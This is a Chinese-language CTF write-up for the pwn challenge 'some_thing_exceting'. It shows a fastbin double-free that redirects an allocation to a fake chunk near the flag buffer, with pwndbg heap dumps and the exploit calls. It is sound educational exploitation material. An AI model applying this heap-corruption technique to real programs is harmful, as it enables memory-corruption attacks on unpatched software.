还是高校战役的题,并且以前做过,,,,但当时tcl,复现也不会,虽然现在也很菜
这里再重新写篇文章,记录下。
程序流程
init 程序最开始进入了init函数
init函数首先将flag读入了内存。
接着又将内存flag的数据读入了s,在0x6020a8中。
由于0x6020a0处设置了0x60,可以将fake chunk申请到这里,再读取块数据,即可得到flag
功能
create:创建一个指针chunk,里面存放了ba和na两个块的地址;创建ba和na,大小为0~0x70,fastbin大小内。
delete:free块,但是没有清零,可以double free,获得一定的地址读写能力
view:根据idx打印内容。
漏洞利用
两次create
free(0) -> free(1) -> free(0)
重新申请create2,此时修改2的内容,由于0和2是同一个地址,修改2,修改了0的内容,重新申请4的时候,就可以申请到想要的地址
修改2的内容为0x6020a0-0x8
create3,create4
4即申请到了0x6020a0的位置,打印其内容即为flag
详细过程 0.保护
没开pie
1 2 3 4 5 6 7 winter@ubuntu:~/buu$ checksec gyctf_2020_some_thing_exceting [*] '/home/winter/buu/gyctf_2020_some_thing_exceting' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000)
1.两次创建 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 pwndbg> heap Allocated chunk | PREV_INUSE Addr: 0xf74000 Size: 0x231 Allocated chunk | PREV_INUSE Addr: 0xf74230 Size: 0x1011 Allocated chunk | PREV_INUSE Addr: 0xf75240 Size: 0x21 Allocated chunk | PREV_INUSE Addr: 0xf75260 Size: 0x61 Allocated chunk | PREV_INUSE Addr: 0xf752c0 Size: 0x61 Allocated chunk | PREV_INUSE Addr: 0xf75320 Size: 0x21 Allocated chunk | PREV_INUSE Addr: 0xf75340 Size: 0x61 Allocated chunk | PREV_INUSE Addr: 0xf753a0 Size: 0x61 Top chunk | PREV_INUSE Addr: 0xf75400 Size: 0x1fc01
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 pwndbg> bins fastbins 0x20: 0x0 0x30: 0x0 0x40: 0x0 0x50: 0x0 0x60: 0x0 0x70: 0x0 0x80: 0x0 unsortedbin all: 0x0 smallbins empty largebins empty
1 2 create(0x50 ,'aaaa' ,0x50 ,'bbbb' ) create(0x50 ,'aaaa' ,0x50 ,'bbbb' )
2.double free 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 pwndbg> heap Allocated chunk | PREV_INUSE Addr: 0x10ac000 Size: 0x231 Allocated chunk | PREV_INUSE Addr: 0x10ac230 Size: 0x1011 Free chunk (fastbins) | PREV_INUSE Addr: 0x10ad240 Size: 0x21 fd: 0x10ad320 Allocated chunk | PREV_INUSE Addr: 0x10ad260 Size: 0x61 Free chunk (fastbins) | PREV_INUSE Addr: 0x10ad2c0 Size: 0x61 fd: 0x10ad3a0 Free chunk (fastbins) | PREV_INUSE Addr: 0x10ad320 Size: 0x21 fd: 0x10ad240 Free chunk (fastbins) | PREV_INUSE Addr: 0x10ad340 Size: 0x61 fd: 0x10ad2c0 Free chunk (fastbins) | PREV_INUSE Addr: 0x10ad3a0 Size: 0x61 fd: 0x10ad340 Top chunk | PREV_INUSE Addr: 0x10ad400 Size: 0x1fc01
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 pwndbg> bins fastbins 0x20: 0x10ad240 —▸ 0x10ad320 ◂— 0x10ad240 0x30: 0x0 0x40: 0x0 0x50: 0x0 0x60: 0x10ad2c0 —▸ 0x10ad3a0 —▸ 0x10ad340 ◂— 0x10ad2c0 0x70: 0x0 0x80: 0x0 unsortedbin all: 0x0 smallbins empty largebins empty
1 2 3 delete(0 ) delete(1 ) delete(0 )
3.create 3,并修改fd为fake chunk 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 pwndbg> heap Allocated chunk | PREV_INUSE Addr: 0xce5000 Size: 0x231 Allocated chunk | PREV_INUSE Addr: 0xce5230 Size: 0x1011 Free chunk (fastbins) | PREV_INUSE Addr: 0xce6240 Size: 0x21 fd: 0xce62d0 Allocated chunk | PREV_INUSE Addr: 0xce6260 Size: 0x61 Free chunk (fastbins) | PREV_INUSE Addr: 0xce62c0 Size: 0x61 fd: 0x602098 Free chunk (fastbins) | PREV_INUSE Addr: 0xce6320 Size: 0x21 fd: 0xce6240 Free chunk (fastbins) | PREV_INUSE Addr: 0xce6340 Size: 0x61 fd: 0xce62c0 Allocated chunk | PREV_INUSE Addr: 0xce63a0 Size: 0x61 Top chunk | PREV_INUSE Addr: 0xce6400 Size: 0x1fc01
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 pwndbg> bins fastbins 0x20: 0xce6320 —▸ 0xce6240 —▸ 0xce62d0 ◂— 0x0 0x30: 0x0 0x40: 0x0 0x50: 0x0 0x60: 0xce6340 —▸ 0xce62c0 —▸ 0x602098 ◂— 'flag{winter_excited}' 0x70: 0x0 0x80: 0x0 unsortedbin all: 0x0 smallbins empty largebins empty
1 2 fake_chunk = 0x6020a0 - 0x8 create(0x50,p64(fake_chunk),0x50,p64(fake_chunk))#2
4.create4,create5(申请到fake地址) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 pwndbg> heap Allocated chunk | PREV_INUSE Addr: 0x652000 Size: 0x231 Allocated chunk | PREV_INUSE Addr: 0x652230 Size: 0x1011 Allocated chunk | PREV_INUSE Addr: 0x653240 Size: 0x21 Allocated chunk | PREV_INUSE Addr: 0x653260 Size: 0x61 Allocated chunk | PREV_INUSE Addr: 0x6532c0 Size: 0x61 Allocated chunk | PREV_INUSE Addr: 0x653320 Size: 0x21 Allocated chunk | PREV_INUSE Addr: 0x653340 Size: 0x61 Allocated chunk | PREV_INUSE Addr: 0x6533a0 Size: 0x61 Allocated chunk | PREV_INUSE Addr: 0x653400 Size: 0x81 Top chunk | PREV_INUSE Addr: 0x653480 Size: 0x1fb81
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 pwndbg> bins fastbins 0x20: 0x6532d0 ◂— 0x0 0x30: 0x0 0x40: 0x0 0x50: 0x0 0x60: 0x6e69777b67616c66 ('flag{win') 0x70: 0x0 0x80: 0x0 unsortedbin all: 0x0 smallbins empty largebins empty
1 2 3 4 pwndbg> x/30gx 0x6020a0-8 0x602098: 0x0000000000000000 0x0000000000000060 0x6020a8: 0x6e69777b67610a61 0x696378655f726574 0x6020b8: 0x000000007d646574 0x0000000000000000
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 pwndbg> x/30s 0x6020a0-8 0x602098: "" 0x602099: "" 0x60209a: "" 0x60209b: "" 0x60209c: "" 0x60209d: "" 0x60209e: "" 0x60209f: "" 0x6020a0: "`" 0x6020a2: "" 0x6020a3: "" 0x6020a4: "" 0x6020a5: "" 0x6020a6: "" 0x6020a7: "" 0x6020a8: "a\nag{winter_excited}"
1 2 create(0x50 ,p64(fake_chunk),0x50 ,p64(fake_chunk)) create(0x50 ,'a' ,0x70 ,'a' )
5.打印4 1 2 3 4 [DEBUG] Received 0xac bytes: "# Banana's ba is a\n" 'ag{winter_excited}\n' "# Banana's na is a\n"
以前写的:i春秋新春战役PWN之Some_thing_exceting
下载 文件
